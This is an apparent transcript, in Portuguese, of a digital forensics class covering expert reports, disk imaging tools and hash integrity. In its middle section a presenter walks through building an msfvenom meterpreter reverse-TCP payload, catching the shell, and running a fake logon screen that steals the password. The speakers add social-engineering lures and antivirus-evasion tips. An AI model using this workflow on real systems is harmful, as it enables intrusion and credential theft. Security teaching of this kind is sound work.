resposta, óbvio. Reconstruir a cena. E aí é uma questão que às vezes você vai ser obrigado, tecnicamente falando, a abrir a máquina, porque às vezes você fez uma clonagem, você gerou um clone e vai subir VirtualBox ou VMware, enfim, e vai ver. Vai começar a refazer os passos que o cara estava fazendo, para começar a entender a mente do criminoso, aonde ele foi, aonde ele deixou de ir, aonde ele estava querendo ir. E aí você vai documentar. Na data tal, do dia tal, fulano acessou tal site, conversou com tal pessoa e realizou tais eventos. Isso conclui que. E aí você já finaliza ali seu dado, enfim, o seu documento de laudo pericial e entrega para o juiz e fala, aconteceu isso, certo? A interpretação dos resultados. Redigir laudo, que a gente já conversou ali, onde você vai escrever e vai mostrar o que estava acontecendo. Anexar evidências e demais documentos. Às vezes, o seu laudo não vai ser só o que você falou, o que você encontrou e tal.
Às vezes você vai colocar ali uma evidência, um documento impresso, uma foto, uma planilha, entendeu? Alguma coisa que vai corroborar, né? Que vai corroborar ali com o que você está falando, que vai dar um impacto maior na hora de apresentar aquilo para o júri e vai ser mais sólido para ser utilizado como prova. E aqui é uma parada que é utilizado mundialmente para a galera entender mais ou menos como funciona. Às vezes, explicando, não dá para se entender. E aqui a gente já consegue ter uma visualização colorida e isso fica um pouco mais óbvio às vezes. Primeiro momento, coleta, exame, análise e resultados obtidos. Aí a gente já tem toda tudo aquilo que eu expliquei, mas eu vou mostrar aqui na imagem, beleza? Mídias, que é a parte física, dados, que é a parte que eu vou obter da mídia, já num processo de identificação, informação é o que eu vou extrair dos dados, e evidências é o conhecimento que eu vou ter em cima das informações que eu extraí e que eu vou apresentar no meu laudo. Ficou claro para os senhores? Marcos, Senhor? Só complementando um pouquinho, Por no favor. laudo, né, é muito comum para você, por uma questão de cadeia de custódia, quando você precisa devolver algumas evidências, arquivos digitais, né, você Sim. inserir no laudo os hashes desse artigo digitais para justamente comprovar que aquilo é aquilo mesmo. Então, uma coisa acaba amarrando na outra. Tem que ter todo um cuidado, né, para fazer a custódia das evidências e no final, dentro do laudo, né, você amarra tudo isso com os hashes de todos os arquivos que você está anexando, né, ao material que você está devolvendo, né, para o judiciário, né? Sim. Sim, perfeitamente. Inclusive, eu acredito que no próximo slide a gente vai discutir sobre isso, sobre função hash. Eu vou fazer até um experimentozinho aqui para mostrar como isso é realmente a verdade que o professor acabou de complementar aqui. Excelente complementação. A duplicação de dados. É importante conhecer os meios de duplicação de dados, já que após a apreensão dos equipamentos computacionais, deve-se realizar uma cópia a fim de manter íntegros os dados presentes no dispositivo. Foi o que a gente tinha discutido lá atrás, sobre quem tem um, não tem nada, quem tem dois tem um, quem tem três tem dois. Positivo? Vamos lá. A gente vai agora conhecer algumas ferramentas de duplicação, algumas, né? Tem várias aí presentes no mercado, mas a gente vai conhecer algumas. Duplicação por software, certo? A gente vai espetar ali um HD na máquina, do outro lado outro HD, e aí a gente vai fazer a duplicação de um HD para o outro via software instalado na própria máquina. Neste tipo de operação são utilizadas ferramentas que buscam realizar a cópia. Depois eu vou enviar esse material corrigido, viu? Desculpa pelos erros. Total dos dados existentes no disco. Aí tem o FTK Media para Linux, DD, que é por linha de comando, tem o DFL-DD, o DFL3DD, que ele é uma interfacezinha gráfica até auxilia, mas eu ainda prefiro o DD porque você já sabe exatamente o que você está fazendo. Você seta as flags e você tendo conhecimento das flags e do comando em si, você tem total controle do que você está fazendo ali em cima da cópia. Só que cuidado, às vezes você troca um SDA pelo um SDB, um SDC, você termina fazendo uma clonagem errada. Às vezes você termina clonando seu próprio sistema dentro do HD em vez do HD do criminoso lá. É bom, é interessante ter esse conhecimento aí. Encase é uma ferramenta, se não me falha a memória, ela é paga. Trouxe até, eu coloquei ela aqui, ó. Tá. Aqui, Encase Forensic. Esse é o site dos caras, entendeu? Aqui é onde começa a ficar uma brincadeira de gente grande, entendeu? Onde começa a elevar mais o nível da coisa. Tem isso daqui craqueado? Tem. O ser humano dá um jeito para tudo, entendeu? Mas há um intuito de conversar isso de maneira legal, vamos trabalhar em cima do site dos caras. Aí ele fala e tal, que ele é um software criado e
coleciona ali mais de 1000 tipos de equipamento e etc, enfim. Isso daqui é só uma questão de marketing. O que interessa para a gente é isso daqui, ó. Ele vai desde a triagem até o reporte. Como assim? Eu peguei, fiz a triagem dos equipamentos e etc, fiz a coleta de dados, descriptografei as informações que estavam criptografadas, vi o que era relacionado ao que, fiz a filtragem depois que eu tive os dados limpos, investiguei. Como assim fiz a investigação? Às vezes o processo não é só coletar os dados e apresentar num laudo técnico. Às vezes eu preciso fazer uma investigação em cima daquilo para ver se isso se correlaciona com outro crime ou com outra situação, enfim, que vai poder me levar, às vezes, a uma coisa bem maior. E aí depois eu vou reportar aquilo para uma autoridade, entendeu? Nem sempre essa investigação vai estar aqui no meio. Às vezes você vai do processo, você vai reportar direto, mas para marketing, para falar que eles estão sempre em todos os pontos, inclusive isso daqui é utilizado por grandes empresas de forense, eles colocaram aqui que eles vão desde a triagem, a parte física mesmo, até a parte de reporte, escrever ali um laudo técnico e tal, eles também vão te auxiliar, certo? Eu quis mostrar o site, certo? Porque às vezes eu falando ali no slide não fica tão claro, às vezes é interessante você ver o site para você pesquisar depois. Isso daqui depois vocês me cobram, que eu vou deixar aqui o link para vocês às vezes estudar isso daí e dar uma olhada. Marcos, senhor? desculpe ter atrapalhado de novo, mas só complementando, aqui na Politec e na Polícia Civil do Mato Grosso, nós utilizamos o Celebrite, que vai na linha. É tão bom, é similar a esse daqui, mas é só para. E já se usa, isso faz uma série de anos, né? Nós temos a assinatura dele. Bem bacana, bem parecido com esse daí, muito bom. Celebrite é de uma empresa israelense. Israelense, a gente vai dar uma olhada nele. Ontem eu conversei sobre ele, aquele. É um pacote imenso, né? Eles têm o software, tem o hardware, a gente tem o hardware do Celebrite. O hardware dele consegue quebrar um monte de criptografia de telefone. Hoje a gente falou em cima de perícia forense em cima de telefone. Aí eu falei da Celebrite, que utiliza de técnicas, inclusive consegue quebrar as últimas criptografias, tanto do Android quanto do iOS. Quando é a última versão, sei lá, do iOS, eles pedem para que mande para eles, né? Eu acho que é justamente para garantir um certo segredo a respeito das técnicas que ele utiliza. Mas, assim, um Android convencional e um OS um pouquinho mais antigo, que já teve zero day, né? Ele pega tudo, né? Mas, assim, é uma empresa grande, ela tem diversas soluções também como essa, né? E é legal que o site dela já está em português, inclusive. Sim, exatamente. Para Windows, a gente tem o EASUS Disk Copy. Por que eu coloquei só uma ferramenta de Windows? Porque, olha, a maioria das ferramentas que a gente tem para clonagem de dados, de HD, etc., no Windows é pago. Então, já deixa quieto essa história. Sinceramente, galera, se vocês querem trabalhar com perícia forense, é interessante conhecer Linux. E eu recomendo entender um pouco de programação, porque um pouco assim, não precisa ser o expert, mas entender algumas linhas ali para saber, às vezes, o que você está fazendo. Porque em algum momento, às vezes, você vai precisar criar um script, alguma coisa para automatizar o seu processo, e o conhecimento de programação nunca é demais. Beleza? E entre outras, isso daí, essa parte de duplicação por software, se você jogar na internet, você vai ter muitas outras ferramentas e eu acredito que seja interessante o conhecimento. Duplicação por hardware, aí é onde a gente já começa a parada mais séria, entendeu? É onde já começa uma investigação de um nível mais alto. Esta etapa exige um hardware específico para gerar a cópia dos dispositivos ou do dispositivo. O mesmo dispõe de mecanismos e ferramentas internas que são pré-programadas para realizar a duplicação do disco, certo? Aí tem o disco DX Forensic, Field Station e o Ward Protect Desktop. Eu vou dar uma olhada nele aqui, eu também abri o dito. Aqui o dito. É essa caixinha aqui, certo? Caixinha simples, ele tem ali só um displayzinho
para você selecionar as funções que você quer. Atrás dele é o que interessa para a gente. Vamos dar uma aproximada aqui, ver se eu consigo olhar mais de perto. Beleza. Disco A e disco B, certo? Aí isso já fica implícito que de um lado vai ficar o que vai ser clonado e de outro vai ficar o HD que vai receber os dados. Aí tem entrada de SATA para HD antigo, tem entrada USB 3.0 para o cara ter uma liberdade maior de transferência de dados, tem uma entrada RJ45 para realizar uma conexão de internet, enfim, é um HD já, é um dispositivo já totalmente equipado para o dia a dia, para o cara levar para o campo, né? Para ali, para a cena de crime. Às vezes ele chega numa situação que ele não pode retirar e não pode levar o HD embora, ou inclusive mesmo dentro do laboratório, às vezes ele quer uma coisa mais confiável, ele realiza, através desse hardware, a clonagem do HD de maneira segura. Ah, e o que é interessante, que eu esqueci de colocar ali, esse equipamento, ele bloqueia a escrita, ele fica apenas no modo leitura, porque às vezes o dispositivo, a ferramenta que está fazendo a clonagem do HD, a duplicação do HD, ela escreve alguns dados no HD e isso interfere na investigação. Esse tipo de ferramenta, ele bloqueia a escrita do software em cima daquele HD que está sendo clonado e isso não interfere na imagem original do disco, beleza? O outro era o Write Protect. Vamos dar uma olhada nele aqui. Fechar esse cara. Aqui. Essa ferramentinha aqui, ó. Esse cara. Certo? De certa maneira, ele é parecido com o outro. E aí, cara, que sacanagem. Mas tudo bem. De certa maneira, ele é parecido com a outra ferramenta. Só que é de uma outra empresa diferente, utiliza as mesmas técnicas. E o preço dela é um pouquinho mais em conta do que o dito DX Forensic. Função hash. Tem como objetivo manter, como o professor falou, a integridade do dado no qual a mesma foi gerada. Principais funções hash. Eu coloquei principais, mas não quer dizer que sejam essas as que são mais utilizadas. MD4, MD5, SHA-512, SHA-256. Certo? Eu fiz uma brincadeirinha aqui, eu vou tentar reproduzir isso no Kali Linux aqui, para a gente enxergar como isso é verdade, beleza? Vamos lá. MD5, sum, terminal, não LS, para ver onde eu estou, MD5, sum, traço B, se não me falha a memória, é isso mesmo. Arquivo.txt, vamos colocar aqui ala.txt. E aí, assim não dá certo também, né? Foi mal, galera. Pulei uma parte aqui, importantíssima. Assim também não vai. Isso. Ixi. Galera, estão me ouvindo? Estamos ouvindo, parece que... Beleza, o que aconteceu aqui? Meu telefone acabou a bateria, eu vou colocar ele para carregar de novo aqui. É que eu esqueci desse detalhe, cara. Ei, vacilo. Hoje está sendo um dia... Estamos te ouvindo bem, pode continuar. Beleza, vou tentar carregar aqui, vamos lá. Vou subir um fone aqui para escutar vocês melhor. Positivo. Beleza. A gente estava brincando aqui.
novo arquivo vazio. Vou abrir ele com o Leafpad. Beleza. Ctrl. Salvar como. Beleza. Tranquilo. Percebam vocês que eu não gravei nada lá, beleza? Não tem nada gravado dentro do arquivo. Tá. Agora, se eu der esse comando aqui, terminal aqui, md5s_sum -b, e o nome do arquivo era l, beleza. Esse aqui é o meu hash original, certo? Copiar a seleção. Ó, aba. Agora, adicionar a letra A. Ó como é que a coisa já começa a mudar. Certo? S. Erro. Ano. L. Beleza. Adicionei somente a letra A. Ctrl O, salvei. Ctrl X, saí. E agora eu vou executar o mesmo comando. md5s_sum -b e o arquivo l.txt. D41, já começa aqui. 943. Vamos para o final? 27e. D81. Já percebe aqui, né, que modificou simplesmente por eu ter adicionado 2 caracteres. Ninguém percebeu, mas eu dei um enter antes de salvar. Eu adicionei 2 caracteres e isso já fez com que mudou a função hash de maneira completamente, certo? E isso numa investigação digital não pode. Por que que o professor ali citou a questão da criação de hash, certo? Porque numa investigação digital, quando eu fiz o levantamento das informações, dos ativos presentes na rede, e etc, certo? Dos equipamentos que eu consegui lá, né? Eu preciso, de maneira urgente, criar um hash para o dispositivo, porque quando eu apresentar isso para as autoridades, para as autoridades de força maior, para o júri, enfim, ele vai querer perguntar, mas qual a credibilidade que eu vou te dar? Como é que eu sei que isso não foi alterado pelo senhor ou por qualquer outro perito? Aí é onde vai começar a questão da análise de hash, entendeu? Aí ele fala, ó, no começo das investigações, o hash adicionado foi esse. No final das investigações, e perante a outros peritos, o hash adicionado, o hash extraído desse arquivo também foi esse. Os hashes sendo iguais, já não precisa mais ter aquela questão de a dúvida se é verdadeiro ou não. Tudo bem, estou subindo meu telefone aqui, só um minutinho, vamos lá. Enquanto isso, a gente vai continuando. Compreenderam a função do hash? Por que ela é importante? Deu para entender? E, Marco, só dar um adendo. Pessoal? Tá me ouvindo? Vocês estão me ouvindo, tá pessoal? Ouvindo, Marco? Nós estamos te ouvindo. Tá me ouvindo? Pessoal? Ah, tá, tudo bem, tudo bem. Tá ouvindo? Estranho. Tá ouvindo? Que estranho, cara, o fone não funcionou. Deixa o telefone mesmo. Beleza, estou subindo o telefone aqui também. Mas tá. Só vamos lá. O MD5, o MD5 já tem, não nessa questão de forense, mas na questão mais de hacker, alguns hackers já estão conseguindo quebrar o MD5, ele já está um pouco em desuso, hein? Você vê o tamanho daquele hash. Só para apresentação, tá beleza. A gente escreveu um artigo e a gente usou o MD5.
E nós submetemos o artigo num evento e o cara questionou por que nós usamos o MD5. Era só para demonstrar. Era um estudo de caso e a gente estava demonstrando. Tinha uma nota de rodapé que dizia, né, que o MD5 é utilizado apenas porque, para ele caber dentro da tabela, se você usar um SHA-512, ele dá um código muito grande e a tabela bagunçava o artigo. Mas, enfim, o MD5 ele tem colisão. O que é colisão? Você pode, vamos imaginar que você gera aí 1 milhão de hash, pode ser que um desses hashes, apesar do arquivo ser diferente, ele gera o mesmo código, então colide o código pode colidir, se gerar um código igual a um outro código que você gerou. Não sequencialmente, mas em algum momento. Então, isso é uma falha do MD5. É bem raro isso acontecer, mas pode acontecer, né? Mas a questão maior, acho que não é nem tanto de colisões, eu acho que é mais de descriptografar ele mesmo. Só um minutinho, o telefone acabou de subir aqui, aí eu já estou voltando com a webcam novamente. Como é que tá? Marco, Beleza, estão me ouvindo aí? então dá um tempinho aí para me apresentar o MS Venom para eles, enquanto Ah, você beleza, carrega beleza. aí. Não, tá safe, tá É bom safe. que dá Manda um ver. tempinho para você carregar seu celular. Tá bom. Manda ver, galera. Então agora vamos para a nossa parte de ferramentas, né? Ontem nós mostramos o MFF Console e hoje, porém, ele era meio automatizado, né? Os payloads já estavam todos prontos e era uma coisa bem automática. Hoje a gente vai tentar fazer uma coisinha um pouco mais manual. Não tanto, não vamos criar um vírus, né, um payload do zero, mas vamos usar uma ferramenta que cria um payload. Deixa eu carregar minha tela aqui. Beleza, vocês estão vendo minha tela aí, né? Creio sim, que eu estou vendo pelo celular, provavelmente vocês estão vendo também. O que acontece? Nós vamos usar um módulo chamado MS Venom. O que ele faz? Ele cria um payload, seja ele para Windows, Linux, Mac, porém, nessa ocasião, nós vamos usar para o Windows, que é um pouco mais fácil. Já estou com a minha maquininha virtual do Windows aberta aqui. É aquela mesma de ontem, pode observar que ainda está aqui aquela pastinha que nós criamos. Deixa eu só ajeitar a resolução para mim, que a resolução para mim está estranha. Deixa eu ver qual que é o IP dessa máquina. Perfeito, 151. Carregar o módulo. Momento. Pois bem, vamos lá. MSF. Menos P. Esse vírus que nós vamos criar vai ser baseado no TCP reverso. Então, o que nós precisamos? Especificar o que vai ser, o que nós vamos fazer. Então, vai ser o Windows /meterpreter /reverse TCP. O Lhost. O Lhost é o IP da minha máquina que estou usando. Minha máquina é final 156, 192.168.0.156. Então, ele vai criar um shell reverso para essa máquina. Lhost. Uau. Também precisamos setar uma porta. Lport.
A porta pode ser qualquer uma das portas livres. Eu vou chutar aqui uma porta bem alta. -F e XZ. E aqui eu vou dar um nome para o meu vírus. Vou colocar payload. Não, vou colocar mais um. Vírus.exe. Vai demorar uns 30 segundinhos para fazer aqui. Beleza. Criou o nosso payload. Se eu der um file nesse arquivo, podemos ver aqui algumas informações sobre ele. Agora, eu vou criar um servidor usando Python. Esse módulozinho do Python é bem interessante. Perfeito. Aí agora é o que entra, digamos assim, a engenharia social. Eu preciso enviar esse vírus para a pessoa do Windows. Então aí eu provavelmente dispararia e-mails ou mandaria links falsos e a pessoa iria baixar. Baixa aqui o seu arquivo, sei lá, para cracker desse jogo, um .exe. Você acha que é um cracker, mas na verdade é um vírus. Aqui. Perfeito. Isso aqui está disponível por causa do módulozinho em Python que nós criamos. É apenas para poder compartilhar uma coisa para outra, para não precisar enviar por e-mail alguma coisa. Só um servidorzinho web para eu poder baixar aqui rapidamente. Vou baixar o arquivo. Salvar. Opa. Estou baixando errado, né? É o vírus.exe. Exatamente, é o vírus.exe. É porque eu já tinha feito o teste antes, estava com outro nome. Pronto, baixou. Provavelmente vai estar aqui na minha área de trabalho. Perfeito. Vou voltar lá, vou abrir uma nova aba aqui. MFS Console. Esses aqui vocês estão lembrados, né? A gente usou ele ontem. Demora um pouquinho, porque é a máquina virtual, né? A máquina virtual é um pouquinho mais fraca. Beleza, abriu. Vou usar um exploit chamado handler, um exploit /multi handler. Certo, vou setar um payload Windows Meterpreter Reverse. Vou setar o meu LHost. O LHost é o IP da minha máquina. Vou setar uma porta. Acho que foi essa mesma que eu criei lá no MS Venom. Conferir. É isso mesmo. 4445. E agora vamos deixar ele executando para ficar ouvindo a ele. Teoricamente, quando eu clicar lá naquele vírus, ele tem que mostrar aqui para mim. Vamos ver se vai dar tudo certo. Executei, o usuário chegou aqui, executou achando que era alguma outra coisa. Não aconteceu nada. Ele só apaga o programa e deixa para lá. Mas aqui, no meu Kali, ó, reparem a mensagem. Uma sessão aberta.
Pronto, eu já estou dentro da máquina Windows do cara. E agora eu vou tentar mostrar uma coisinha para vocês, que é o fake logon. Porque ontem, da forma que nós fizemos, a gente consegue pegar a senha do cara, mas dessa forma a gente não consegue, porque nosso payload é outro. Nós não estamos usando o mesmo payload de ontem. Então eu não consigo saber a senha, apesar de estar dentro da máquina Windows do sujeito. Estou na página desktop, se eu der um ls, pode ver que nós temos as mesmas pastas que nós temos lá, ó, hackerman, vírus.txt. Agora, eu tenho aqui, eu já tenho ele aqui. É esse fake logon screen.exe. Você acha ele no GitHub. Depois eu posso mandar o link. Está disponível no Git. Então eu vou fazer o upload daquele arquivo. Upload /home, não, /root fake logon. Perfeito. Agora esse upload, esse fake logon está lá na página do nosso Windows. Olha lá ele lá. E por aqui mesmo, pelo Kali, eu vou executar, mas eu não consigo executar sendo usuário Meter, porque eu preciso entrar num shell. Um shell. Agora eu estou usando um shell do Windows. Agora eu consigo executar aquele programa. Para executar, é só chamar o nome do programa. Fake logon screen.exe. Foi. Vamos ver se foi lá. Vamos esperar um pouquinho. Olha o que ele faz. Ele minimiza todas as janelas do Windows e abre essa tela de login. Ela está um pouquinho zoada, assim, meio mal feita, mas é porque esse aqui foi feito para Windows 10. Então aqui no fundo tinha que aparecer o fundo da área de trabalho, aquelas coisas do Windows 10. Porém, eu não consegui levantar uma máquina Windows 10 e a Kali ao mesmo tempo. Minha máquina real não aguentou duas máquinas virtuais, sendo uma Windows 10 e uma do Kali. Então eu subi uma do Windows 7 mesmo. Por isso que ficou um pouquinho diferente. E olha que bacana aqui. Se eu colocar a senha ABC, não foi, diz password incorreto. Se eu for lá no meu Kali, aqui, o cara tentou escrever a senha, ó, ABC, e ainda me diz que está errada, wrong. Vamos tentar lá de novo. O cara tentou colocar a senha dele de novo, não foi. Tentei colocar lá, Diox, está errada, não é essa senha também. Agora eu vou colocar a senha real aqui, que é 123. Logou. O usuário nem percebeu, deixou passar. Provavelmente eu não ia fazer o upload desse arquivo na área de trabalho, né? Eu ia fazer um lugar bem mais escondido. E aqui no meu shell ele me mostra, ó, a senha do usuário W7 é 123 e é isso mesmo, está correta. Para isso funcionar, boa parte desse processo vai ser engenharia social. Você vai ter que dar um jeito de enviar esse vírus para o cara vai ter que executar lá. Apesar de que geralmente você ganha isso por quantidade, né? Você manda para várias pessoas que em um momento alguém vai acabar clicando. E é isso aí. Pode continuar, Marcos. Se alguém tiver alguma observação. Marcos, tá ouvindo aí? Sim, eu estou aguardando alguma contribuição da galera aí. Pessoal, a título de curiosidade, né? Vamos supor que isso aqui é para uma situação de pentest, viu? E para que as pessoas que não tiveram esse conhecimento, essa interação ainda, entendam às vezes como funciona, porque daí se precisar algum dia realizar alguma perícia, alguma coisa, né, começar a entrar nesse mundo, já começa a compreender. Mas, enfim, a título de curiosidade, dá para a gente disfarçar esse ponto .exe dentro de uma imagem JPEG. Sim, dá para você embutir um no outro e aí você, por exemplo, manda para uma funcionária de uma empresa, você sabe que ela gosta de flores. Ela faz coleção de orquídea. Aí você tem o e-mail pessoal dela e aí você manda para ela bem assim: a nova coleção de orquídeas
do deserto do Saara chegou. Mano, orquídeas do deserto do Saara, mas tá. Beleza. Chegou. E aí você coloca lá umas paradas bacanas que mandaram aqui, velho. Já vamos. Eu estou com muito. Caramba, velho. Já se passa no Defender. Então, deixa eu responder a pergunta do Luiz Felipe. Provavelmente o Windows Defender vai pegar, mas porque ele já está muito batido. Mas tem técnicas onde você vai encapsulando esse vírus dentro de outras coisas, dentro de outros vírus, e tem alguns programas, alguns sites, que eles têm meio que, entre aspas, a banco de dados desses antivírus. Então você pode testar lá. Você faz o upload do seu vírus nesse site e ele vai dizer, ó, no Windows Defender, na atualização tal, vai passar. Provavelmente desse jeito que eu fiz aqui, o Windows Defender vai pegar, porque foi um modo bem grosseiro, foi bem rústico para mostrar para vocês como funciona. Provavelmente o cara nunca iria fazer desse jeito, ele ia encapsular isso várias e várias vezes para que o antivírus não pegasse. Marcos? Sim. A parada lá que eu tava falando, e aí você usa a engenharia social para... Aí, ó. Os caras já mandou ali, velho. Os caras é liso. E aí você manda para ela foto de umas orquídeas e tal. A tiazinha dá uma olhada lá. Nossa, orquídeas, que bonito. Ela clica. E no que ela clica, às vezes a curiosidade dela é grande, ela fala, eu vou baixar. Aí você vai e fala assim, ó, baixa essa imagem e tal, leve com você, enfim, coloca alguma coisa para induzir a ela a baixar aquilo lá. E aí, quando ela... Eita, caramba. E aí, quando ela clicar naquela imagem, o que vai estar rodando por baixo é aquela parada que o cara fez. Entendeu? Vai conseguir o acesso ao shell da pessoa. Sobre essa parada do Windows Defender, é mais fácil passar do que imagina. Porque, assim, hoje, quantas pessoas, usuário doméstico, usam o Windows original? 90% não usa. E aí, onde é que está a graça nisso? A graça, entre aspas, mas vamos pensar como um criminoso agora. Raciocinar como um criminoso. Aonde é que está a graça nisso para gente que é criminoso? Né? As builds, geralmente, as compilação que o Windows desses usuários está retido, geralmente é uma compilação lá atrás. Uma compilação bem antiga, bem... Porque geralmente ele levou lá na loja de informática, o cara já tem um pendrive pronto, e aí ele espetou o pendrive. Primeira coisa, ele vai desabilitar o Windows Update. Já começa aí. Por quê? Porque ele precisa ativar o Windows e o Windows Update bloqueia. Aí ele desabilita o Windows Update, ele desabilita o Windows Defender, todos os módulos, ativa o Windows e volta o Windows Defender normal. Só que o que surgir a partir dali para o Windows Defender já não vai conseguir o Windows Defender pegar. Então tomem cuidado ao confiar no antivírus do Windows, porque não é muito bom não, cuidado. É interessante vocês ter, se for utilizar o Windows, utiliza ele ativado. Ah, mas eu não quero comprar licença. Então tem que abrir mão de algumas coisas aí, cuidado. Usa Linux que não precisa comprar licença. Exatamente, usa Linux que não precisa comprar licença. E na maioria das vezes o cara não vai conseguir ganhar acesso root tão fácil. Entendeu? Ele não vai conseguir subir uma ferramenta na tua máquina, e se ele conseguir subir, ele vai precisar saber sua senha de root para ele realizar alguma atividade administrativa no teu sistema. Beleza? Caran, você quer mostrar mais alguma coisa? Caran? Não, vou desativar minha tela. Eu ia só brincar aqui, mas... Não, se você quiser continuar brincando e mostrar pra gente depois, aí eu vou apresentar. Não, era só zoeira mesmo, só pra enquanto você falava aí, não é nada demais. Ah, beleza. Então é isso aí, galera. Foi só pra gente descontrair, mas o perigo é real, né? O perigo é real. E fique esperto, às vezes você baixa uma foto, alguma coisa com um arquivo dentro aí de graça, ganha um shell reverso e termina, às vezes, sendo usado para escalação de privilégio dentro da sua empresa. Cuidado ao levar sua máquina de casa para o trabalho. Positivo? Vamos continuar aqui. Compartilhar.
tela inteira. Todo mundo vendo aí? Tranquilo? Beleza. Todo mundo tá vendo a tela ali? Sim, tô vendo. Beleza. Ferramenta. Computer Online Forensic Evidence Extractor, COFE. Software que reúne um conjunto de ferramentas para o auxílio do perito para a aquisição de material e memórias voláteis. O que rola? Eu tinha até aberto isso daqui, ó. Ele no site do Daniel Donda, se não me falha a memória. COFE. Aqui, COFE. Para você obter essa ferramenta, é um pendrivezinho. Ele já foi até descontinuado, mas é uma parada que ainda é utilizado hoje. Certo? É um pendrivezinho de 40 MB. Para você obter esse pendrive, antigamente você falava com a Microsoft. Hoje em dia, você tem que mandar um e-mail para a Interpol e pedir para eles, eu sou um perito, eu quero utilizar essa ferramenta, assim, assado. Entendeu? É para esse fim, eu trabalho com isso. E aí, numa perícia viva, onde eu preciso extrair e fazer um dump de memória, de uma memória RAM, eu espeto o pendrive e aí ele vai extrair as informações da memória RAM de maneira inteligente para mim. Beleza? Isso daqui é só uma ferramenta que, a título de curiosidade, esse artigo até foi escrito no ano de 2011. Porém, essa é uma ferramenta interessante, porque às vezes você está perdido lá, como é que eu vou fazer minha perícia em modo live se eu não tenho equipamento? Esse é um equipamento já interessante para você começar a dar os primeiros passos aí e entender essa situação. Beleza? Não vou nem abrir a segunda tela, porque a tela mais grande, porque a Encase, uma das maiores e mais completas ferramentas de investigação forense. Sim, esse cara tem tudo, certo? Tem tudo. Por que ele tem tudo? Cadê? Porque a gente já vinha discutido essa parada aqui. Eu acho que até dupliquei esses slides, né? Peço desculpa por isso, mas esse cara tem tudo. De novo, falando mais um pouco dele, ele tem uma ferramenta que você pode extrair 100% da sua perícia, inclusive é uma das ferramentas que vem ganhando nos últimos 10 anos os melhores prêmios das maiores agências de investigação do planeta. Elas nomeiam a Encase como uma das melhores ferramentas e mais indicadas para perícias em nível mais alto, em nível operacional maior. Kali Linux, não podia deixar de falar dele, né, velho? O sistema favorito aí é um sistema operacional Linux baseado no Debian, que foi desenvolvido pela equipe Offensive Security, que hoje em dia ela também disponibiliza a questão de segurança, a questão de certificação, certo? Você tem uma certificação da Offensive Security, você já é reconhecido mundialmente como um cara já com conhecimento bacana. Ele contém mais de 300 ferramentas, realmente, se for a versão full, ela vai ter aí 8 GB de ferramenta, e ela vai ter cerca de 400 ferramentas aí, nativas para teste de invasão e penetração e perícia forense, certo? E fora que você pode também customizar e colocar suas próprias ferramentas. Vamos dar uma olhada no cara. É isso daqui, ó. O cara é esse cara. Vamos fechar aqui o terminal que eu tinha aberto. O que acontece? Quando a gente começa a estudar ali perícia forense, eu vou trabalhar em cima de perícia forense. Esquece a parte de pentest, certo? Ele compreende a parte de pentest, mas isso é outro assunto. A parte de perícia forense, eu preciso saber duas coisas. Information gathering. Por quê? Porque às vezes eu vou precisar fazer um OSINT em cima do meu alvo. Às vezes eu encontrei uma informação dentro do HD dele, certo? Que vai me gerar uma investigação e eu preciso saber de onde é que está vindo esse cara, quem é, de onde é que foi, esse endereço de e-mail, se ele é válido, se esse endereço de e-mail liga a outras contas, enfim. Aí, geralmente, tem o Maltego e o T-Revester, que é duas ferramentas aí interessantíssimas e que auxiliam muito nessa questão. Agora, na parte de forense, olha lá, ó, Digital Forensic, certo? Que é o DFDD. Aí tem o DCC3DD,
e o DCFLDD. As duas ferramentas são, entre aspas, uma interface gráfica para utilizar a ferramenta DD que eu tinha falado lá atrás, certo? Extreme Delete, isso daqui você consegue trazer os dados de volta, certo? As ferramentas aqui de baixo eu nunca trabalhei. Aqui, Forensic Carving Tools. Aí já começou a falar em Data Carving, certo? E aí você já começa a parte de restauração de dados em HD mais problemático, às vezes numa mídia com defeito, ou que foi excluída os dados de maneira acidental, ou por intencional mesmo. Aí tem o Foremost, já trabalhei. O Scalpel, já dei uma olhada. Eu nunca fiz algo a um nível mais avançado nele, mas também já dei uma mexida com ele. E o Recover JPEG. Isso daqui foi criado especialmente para arquivo JPEG. As pessoas às vezes modificam o código dele e dão uma mexida para outro tipo de coisa. Mas isso daqui geralmente você utiliza para buscar arquivos de imagem dentro do HD. Se você tem certeza que aquilo vai te trazer um JPEG, use essa ferramenta que às vezes você vai ter um retorno mais rápido. Forensic Imaging Tool. Isso daqui é a parte de clonagem mesmo, de duplicação de HD. PDF Forensic Tool, às vezes o PDF do cara ali está contido alguma esteganografia, alguma coisa por baixo ali, e é interessante você fazer uma perícia em cima daquilo, porque pode te revelar alguma coisa interessante. E o SKS, Sleuthe Kit Suite, excelente. Foi o que eu utilizei na monografia. Autopsy, que é uma interface gráfica que você abre pelo Firefox para utilizar todas essas ferramentas aqui, ó, entendeu? Aí você tem acesso a todas as ferramentas de maneira como interface gráfica. Agora, se você precisar fazer na unha mesmo e quiser entender, aí você vai uma por uma. Geralmente, cada uma tem a sua função específica. As que eu utilizei foi a FLS, FSS Stat, a FLNDD e JLS e a MMLS. Eu acho que foi só isso. Não me pergunte como é que eu utilizo essa ferramenta, porque faz muito tempo que eu não mexo. Entendeu? Claro, se eu pegar para mexer de novo, as coisas vão voltar. Mas agora de cabeça, as flag e como é que seta, vai ser meio difícil dizer. Uma coisa eu digo, certo? Quando eu fiz a restauração dos dados em cima do pendrive que a gente teve, no livro e nos outros artigos que eu estava dando uma olhada, eles só falavam, utiliza o FLS para poder ver a sequência de arquivo que tem lá, entendeu? Que ele vai te exibir os arquivos que estão contidos dentro daquela imagem, o FLS. E depois disso, você seta uma flag ou outra, e aí você consegue extrair ali o MacTime dos negócios, inclusive eu acho que tem MacTime por aqui, deve ter, aqui é o MacTime, Sleuthe Kit. E aí você consegue ver pelo MacTime o tempo, né? Quando foi alterado, por que foi alterado, por quem. Só que, em momento nenhum, alguém citou que precisava utilizar o MMLS para mim poder enxergar quais partições existiam na imagem. Você está entendendo? Então, às vezes, você se basear num tutorial de artigo do cara é fria, entendeu? É fria. Não se baseia por, não, o tutorial do cara deu certo. Ontem até eu tive uma discussão com o professor, discussão positiva sobre isso. Às vezes você vê um tutorial, para o cara funcionou, mas a sua realidade é outra. Então, você precisa buscar ali 5 ou 6 fontes diferentes, porque em uma delas você vai ver que foi diferente, às vezes atende a sua necessidade. Porque no caso, eu tinha mais de uma partição e eu precisava entender aonde começava o disco e aonde terminava aquela partição, para mim poder realizar a perícia em cima daquilo. Às vezes tem uma partição oculta que o cara justamente ocultou com os dados ali para passar por baixo pela perícia e deu certo. Por você não verificar o quanto de partição que tinha, a sua 